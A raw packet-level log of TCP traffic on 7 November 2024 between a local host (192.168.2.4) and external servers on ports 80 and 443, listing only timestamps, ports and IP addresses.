Nov 7, 2024 07:33:32.290030003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290039062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290065050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290091991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290132046 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290142059 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290160894 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290191889 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290203094 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290219069 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290224075 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290245056 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290250063 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290333033 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290343046 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290352106 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290368080 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290368080 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290391922 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290417910 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290451050 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290513039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290524006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290539980 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290610075 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290620089 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290631056 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290638924 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290652990 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290704012 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290714979 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290724039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290728092 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290745020 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290791035 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290810108 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290815115 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290821075 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290843010 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290879965 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290899992 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290920973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290930986 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290941000 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.290977001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290977001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.291137934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.299587011 CET	49945	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.299604893 CET	443	49945	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.299927950 CET	49946	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.299940109 CET	443	49946	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.324764013 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324781895 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324791908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324835062 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.324863911 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.324887991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324909925 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324919939 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324954987 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.324965954 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325011969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325022936 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325042963 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325078011 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325078011 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325206995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325217009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325226068 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325242996 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325290918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325301886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325311899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325314999 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325326920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325381994 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325392008 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325401068 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325404882 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325417995 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325534105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325833082 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325896025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325937986 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325948954 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.325984001 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.325994015 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.326008081 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.326033115 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.326056004 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.326153040 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.342632055 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.342652082 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.342744112 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.342756987 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.344697952 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.347022057 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.359541893 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.359541893 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.359553099 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.359563112 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.381133080 CET	49947	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.381160975 CET	443	49947	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.381856918 CET	49947	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.390409946 CET	49947	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.390425920 CET	443	49947	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.404551029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404572010 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404582024 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404598951 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404609919 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404617071 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404687881 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404697895 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404714108 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404769897 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404781103 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404798031 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404823065 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404839993 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404848099 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404850006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404864073 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404922009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404932976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404943943 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.404949903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.404969931 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405014038 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405035019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405047894 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405064106 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405083895 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405159950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405169964 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405170918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405184031 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405217886 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405235052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405242920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405246973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405257940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405278921 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405307055 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405345917 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405358076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405370951 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405424118 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405433893 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405436039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405489922 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405499935 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405499935 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405500889 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405530930 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405541897 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405575037 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405589104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405600071 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405610085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405613899 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405688047 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405689001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405689001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405699968 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405709982 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405728102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405785084 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405792952 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405802011 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405812025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405823946 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405848026 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405913115 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.405970097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405987024 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.405999899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406009912 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406017065 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406058073 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406065941 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406065941 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406071901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406085014 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406095028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406105995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406110048 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406117916 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406121969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406136036 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406177998 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406199932 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406230927 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406243086 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406255007 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406299114 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406311989 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406322002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406373024 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406373024 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406405926 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406419039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406516075 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.406537056 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.406624079 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440211058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440236092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440247059 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440325022 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440336943 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440371037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440382004 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440396070 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440435886 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440435886 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440448999 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440460920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440505028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440515041 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440541029 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440552950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440577030 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440588951 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440624952 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440651894 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440664053 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440673113 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440675020 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440730095 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440730095 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440741062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440749884 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440844059 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440912962 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440937042 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.440978050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.440978050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.441253901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.441309929 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.441319942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.441353083 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.441376925 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.441387892 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.441400051 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.441494942 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.519910097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.519932032 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.519948006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520008087 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520025969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520035982 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520037889 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520061016 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520111084 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520703077 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520741940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520752907 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520766973 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520792007 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520833969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520847082 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520876884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520899057 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520910025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520914078 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520921946 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.520939112 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.520953894 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521018028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521030903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521044016 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521054983 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521065950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521069050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521078110 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521100998 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521100998 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521163940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521173000 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521183968 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521199942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521209955 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521219969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521219969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521224976 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521233082 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521245003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521255016 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521260023 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521260023 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521365881 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521446943 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521459103 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521467924 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521478891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521488905 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521491051 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521502972 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521514893 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521522045 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521527052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521538973 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521576881 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521595001 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521600962 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521606922 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521622896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521625996 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521636009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521648884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521648884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521673918 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521740913 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521752119 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521763086 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521780014 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521785021 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521794081 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521800995 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521889925 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521902084 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521913052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521913052 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521938086 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.521982908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521995068 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.521998882 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522006989 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522020102 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522028923 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522032976 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522042036 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522054911 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522085905 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522085905 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522113085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522125006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522135973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.522156954 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.522222042 CET	49934	80	192.168.2.4	185.215.113.16
